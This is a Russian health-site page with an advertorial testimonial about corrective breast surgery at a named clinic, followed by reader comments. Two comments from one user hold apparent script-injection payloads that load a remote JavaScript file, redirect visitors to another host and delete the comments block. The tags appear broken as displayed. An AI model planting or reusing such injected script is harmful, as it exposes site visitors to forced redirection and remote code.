Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Асимметрия груди. Что дел...  >>  Асимметрия груди. Что делать?
 
Обратная связь
 

Асимметрия груди. Что делать?

Размер шрифта
30 января 2014 12:00
  • google_analytics: false
  • Нравится

Увеличение и коррекция груди – очень популярная операция. В том числе и в России, все большее количество женщин решается на проведение пластики груди, и я – не исключение.

Меня зовут Ольга, мне 25 лет. Для большинства девушек проблемы с грудью ограничиваются мыслями об увеличение груди на пару размеров, но не у меня. Моя проблема в том, что после родов и кормления грудью у меня возникла асимметрия груди. 

В какой-то момент я решила сделать операцию. Любящий муж, конечно, был против, но переубеждать меня было бесполезно, и в итоге он все-таки согласился: «Если ты уверена, я поддержу тебя и буду рядом». И вот я сделала операцию, о чем ни капельки не жалею.

За 3 месяца до операции

Для начала я решила выяснить все о пластической хирургии в целом, и о маммопластике в частности. Я перечитала множество женских форумов, статей и блогов, изучила виды имплантов и их различия, методики установки и возможные осложнения. А главное, я искала хорошую клинику и врача, который помог бы мне.

После того как я была подкована в теории и составила список понравившихся клиник и врачей, я решила перейти от теории к практике. Я обошла около десяти клиник и врачей, каждому из них я задавала каверзные вопросы, которые они, наверное, даже не ожидали услышать от пациента. Определив для себя несколько клиник с наиболее квалифицированными докторами, я сконцентрировалась на них и повторно пришла на консультацию, чтобы более подробно пообщаться с хирургом.

Месяц до операции

Доктор Тимур Кобулашвили мне сразу понравился, и я решила, что именно ему я доверюсь полностью. Как только я зашла к нему в кабинет, он начал стандартную процедуру опроса: как зовут, сколько лет, что беспокоит и т.п. Я рассказала ему о своей проблеме, он сказал: «Давайте посмотрим», и я начала раздеваться. Тимур в этот момент заполнял бланки.

После того как я разделась, он внимательно осмотрел меня и спросил: «Какого результата желаете достичь?» В ответ я сказала, что очень хочу добиться одинакового размера и формы груди и, возможно, чтобы она стала чуть больше. Это оказался единственный врач, который сказал, что главная проблема – это асимметрия груди и что простой установкой имплантов ее не решить, потребуются импланты разного размера, и нужно будет поднимать левую грудь. Это оказалось как раз тем, что я хотела услышать.

Доктор записал все, измерил и, пролистав каталог имплантов, показал те, которые могут мне подойти. Это оказались импланты именно той модели и фирмы, что выбрала и я, когда искала информацию в интернете! После этого он  подробно рассказал мне об операции, анализах, которые надо сдать, и назначил день, когда прийти за анализами и повторной консультаций.

День до операции

Все утро я нервничала, но уверенная в успехе операции, я направилась в клинику. Как только я вошла, меня проводили в палату, дали все необходимое и сказали ожидать анестезиолога и доктора. Я все еще сильно волновалась, но, как только пришел Тимур Кобулашвили с анестезиологом, сомнения улетучились. Мне сделали успокаивающий укол перед операцией (так положено), а потом я уже сразу помню вечер: как я лежу в палате с затянутой в компрессионный бюстгальтер грудью, сверху еще бандаж, и мне очень больно…

Я морально была готова к послеоперационному периоду, но теория и практика оказались совершенно разными вещами. О том, чтобы лечь на бок не могло было быть и речи, а для того, чтобы подняться или сделать любое движение, мне требовалась помощь. К счастью, кнопка вызовы сестры находилась над кроватью. Сестра появлялась мгновенно, как будто стояла всегда рядом. Анальгетиков, воды, в туалет… любые мои просьбы она выполняла беспрекословно в течение всей ночи.

День после операции

Утро было яркое и солнечное. В палату пришел анестезиолог и сразу поинтересовался моим самочувствием. Получив удовлетворительный ответ, он сказал, что операция удалась и вышел. Вслед за ним через полчаса пришел доктор Кобулашвили, сказал, что все отлично и разрешил одним глазком посмотреть на новую грудь. Синяки и отеки были впечатляющими, но  грудь  уже тогда выглядела великолепно! Я была счастлива! Ближе к обеду за мной приехал муж, и я счастливая поехала домой.

Месяц после операции

Я пришла на консультацию к доктору Кобулашвили, он осмотрел меня, проверил все ли хорошо и сказал, что из-за анатомических особенностей строения моего тела правый имплант опустился чуть ниже, чем левый. Такое случается редко, но, как по закону подлости, именно со мной и произошло. Предугадать такое невозможно, но Тимур меня успокоил, сказав, что все можно достаточно легко поправить. Тем более, если по какой-то причине что-то сразу не получилось так, как надо, клиника пластической хирургии «Клазко» поможет все поправить бесплатно!

Мне провели корректирующую операцию, длилась она не больше 30 минут, вечером того же дня я уже была дома.

Через месяц после корректирующей операции

Сейчас я плаваю в бассейне, играю со своими детьми, занимаюсь фитнесом. Вместо компрессионного бюстгальтера я могу позволить себе надеть красивое кружевное белье. Муж, конечно, говорит мне, что его и раньше все устраивало, но я-то вижу, как он начал на меня смотреть. Теперь я уверенная в себе и довольная своим телом женщина. Если бы у меня была возможность вернуться на несколько месяцев назад, согласилась бы я снова сделать операцию? Да, согласилась бы, не раздумывая ни минуты!

Спасибо коллективу клиники пластической хирургии «Клазко» и, в особенности, Тимуру Кобулашвили!

Полную версию статьи читайте в декабрьском номере Allure (2013 г.), или на сайте клиники Клазко.

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

30 января 2014 в 12:41

Цитировать   |   Пожаловаться

Вам повезло с врачом ;-) Хорошо все получилось!

2 - Petrakovskaya Elena

30 января 2014 в 14:46

Цитировать   |   Пожаловаться

Как тесен мир... делала у этого врача грудь 6 лет назад, до сих пор все отлично. Но вот так, на всеобщее обозрение, выставлять себя я бы не решилась.

3 - Konovalova Oksana

04 февраля 2014 в 10:51

Цитировать   |   Пожаловаться

Хорошая статья)

4 - zzzzzz

30 июня 2015 в 18:48

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 22:47

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

6 - asilisa

10 августа 2016 в 22:33

Цитировать   |   Пожаловаться

У меня была точно такая же проблема! Я исправляла у хирурга Татьяны Валерьевны Мавроди, это наш ведущий специалист. Не пожалела! Женщине вообще как то легче доверить такую проблему если честно. С мужчиной все-равно как-то немного не по себе)

Статьи

       
У вас обвиснет грудь! Из-за этих привычек!   Как обследовать свою грудь?   В какой день нельзя идти в больницу!   Вся правда о подтяжке  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Мифы о лифчике!
Как изменить будущее и не заболеть раком груди?
Тесты для вашей любимой груди

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Что вы знаете о груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.